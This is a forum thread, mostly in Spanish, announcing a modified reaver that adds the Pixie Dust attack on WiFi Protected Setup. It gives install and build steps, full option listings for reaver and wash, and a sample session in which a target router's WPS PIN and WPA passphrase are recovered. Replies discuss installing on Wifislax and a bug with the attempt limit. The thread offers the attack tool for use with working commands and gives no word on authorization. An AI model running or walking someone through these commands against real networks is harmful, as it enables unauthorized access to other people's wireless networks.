Seguridad Wireless - Wifi
Sistemas operativos => Zona GNU/Linux => Aplicaciones y diccionarios linux => Mensaje iniciado por: t6_x en 16-04-2015, 10:54 (Jueves)
-
Hello
DataHead and I, made modifications in reaver for him to do the pixiedust when testing a pin number and automate all the work
Here is our contribution
GitHub
https://github.com/t6x/reaver-wps-fork-t6x (https://github.com/t6x/reaver-wps-fork-t6x)
Overview
reaver-wps-fork-t6x is a modification done from a fork of reaver (ht tps://code.google.com/p/reaver-wps-fork/)
This modified version uses the attack Pixie Dust to find the correct pin number of wps
The attack used in this version was developed by Wiire (ht tps://github.com/wiire/pixiewps)
Install Required Libraries and Tools
Libraries for reaver
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
Tools
You must have installed the pixiewps created by Wiire (ht tps://github.com/wiire/pixiewps)
Compile and Install
Build Reaver
cd reaver-wps-fork-t6x-master
cd src
./configure
make
Install Reaver
sudo make install
Usage - Reaver
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file> Send output to a log file [stdout]
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-D, --daemonize Daemonize reaver
-a, --auto Auto detect the best advanced options for the target AP
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv for more)
-q, --quiet Only display critical messages
-K, --pixie-dust Test Pixie Dust [1] Basic(-S) [2] With E-Once(-S) [3] With PKR
-Z, --no-auto-pass Not run automatically reaver to get the password when the pixiewps retrieves the pin
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [5]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-n, --nack Target AP always sends a NACK [Auto]
-w, --win7 Mimic a Windows 7 registrar [False]
-X, --exhaustive Set exhaustive mode from the beginning of the session [False]
-1, --p1-index Set initial array index for the first half of the pin [False]
-2, --p2-index Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop Set Into PixieLoop mode ( doesnt send M4, and loops through to M3 [False]
Example:
reaver -i mon0 -b 00:90:4C:C1:AC:21 -vv -K 1
Usage - wash
Wash v1.5.1 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
mod by DataHead
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --file-output-piped Output Piped x|y|z...
-g, --get-chipset Output Piped and tries to read the chipset with reaver
-h, --help Show help
Example:
wash -i mon0
Example
Reaver v1.5.1 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com>
[+] Switching mon0 to channel 1
[?] Restore previous session for A.:9.:D.:....:....:...? [n/Y] n
[+] Waiting for beacon from A.:9.:D.:....:....:...
[+] Associated with A.:9.:D.:....:....:.... (ESSID: ......)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: c6:66:a6:72:37:6d:......
[P] PKE: 10:cf:cc:88:99:4b:15:de:a6:b3:26:fe:93:24:......
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] WPS Model Serial Number: A978FD123BC
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:......
[P] AuthKey: bf:68:34:b5:ce:e2:a1:24:dc:15:01:1c:78:9e:74:......
[+] Sending M2 message
[P] E-Hash1: 2e:d5:17:16:36:b8:c2:bb:d1:14:7c:18:cf:89:58:b8:1d:9d:39:......
[P] E-Hash2: 94:fb:41:53:55:b3:8e:1c:fe:2b:a3:9b:b5:82:11:......
[Pixie-Dust]
[Pixie-Dust] [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] PSK1: dd:09:bd:24:......
[Pixie-Dust] [*] PSK2: 77:e0:dd:00:......
[Pixie-Dust] [+] WPS pin: 9178....
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin wait ...
[Reaver Test] BSSID: A.:9.:D.:3.:..:..
[Reaver Test] Channel: 1
[Reaver Test] [+] WPS PIN: '9178....'
[Reaver Test] [+] WPA PSK: '112233'
[Reaver Test] [+] AP SSID: '....'
# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U
Any problem or suggestion please contact me
-
Muchas gracias por la implementación.
Salu2
-
gracias por compartir
he descargado el master y reaver modificado y lanzar lanza recoge datos pero no se para !me imagino que tener que parar captura guarda captura y se leera con el master en otra consola
para intalar las lib
sudo apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
me sale apt-get intall no reconoce orden
¿como se haria en wifislax ? ¿alguien me lo puede decir?¿tiene wifislax ya las lib instaladas?
por lo dicho aun asi reaver recogia datos sin las lib
saludos
-
apt-get es el gestor de paquetes de debian,para wfislax es slapt-get
slapt-get --update
slapt-get -i libpcap-dev aircrack-ng sqlite3 libsqlite3-dev
tambien tienes gslapt y slpkg por si en slapt-get no estan los paquetes pero los que nombras creo que ya los lleva wifislax ;) ;) ;) ;) ;)
-
gracias por aclararme un poco las cosas
creo que tienes razon que las lib debe tenerlas wifislax porque lo lanzo y recoge datos
me vale de mucho las aclaraciones de slapt-get
Tienes gslapt y slpkg por si en slapt-get ..... no lo sabia; es que es asi como mola llamar de consola e instalar dependencias y ejecutarlo ;D
gracias amigo un saludo
-
A problem here
with a simply argument
reaver -i mon0 -c 1 -b XX:XX:XX:XX:XX:XX -p 12345670 -g 1 -n -vv
In this sintax i expect a stop after 1 attempt (-g 1)
pin are incorrect , ...and after one try PARTY NON STOP ...
repeating , repeating , repeating ...AP BLOCKED
why no stop after 1 attempt?
original reaver , works perfectly in this sintax arguments....stop after one try
if pin is correct win , if not , stop with only 1 attempt ... because 3 attemps cause AP BLOCKED.
want this working as spected,please.
-
ya han solucionado ese bug aparece tu nombre
Algunas ideas formuladas por nuroo, kcdtv
- Corrección de errores hecha por alxchk, flatr0ze
+ Corrección de errores hecha por alxchk, flatr0ze , USUARIONUEVO
#Gracias Especiales
Soxrok2212 por todo el trabajo realizado para ayudar en el desarrollo de herramientas
-
ya han solucionado ese bug aparece tu nombre
Algunas ideas formuladas por nuroo, kcdtv
- Corrección de errores hecha por alxchk, flatr0ze
+ Corrección de errores hecha por alxchk, flatr0ze , USUARIONUEVO
#Gracias Especiales
Soxrok2212 por todo el trabajo realizado para ayudar en el desarrollo de herramientas
contacte con el , a fin de cuentas era un problemilla a solventar ;) >:(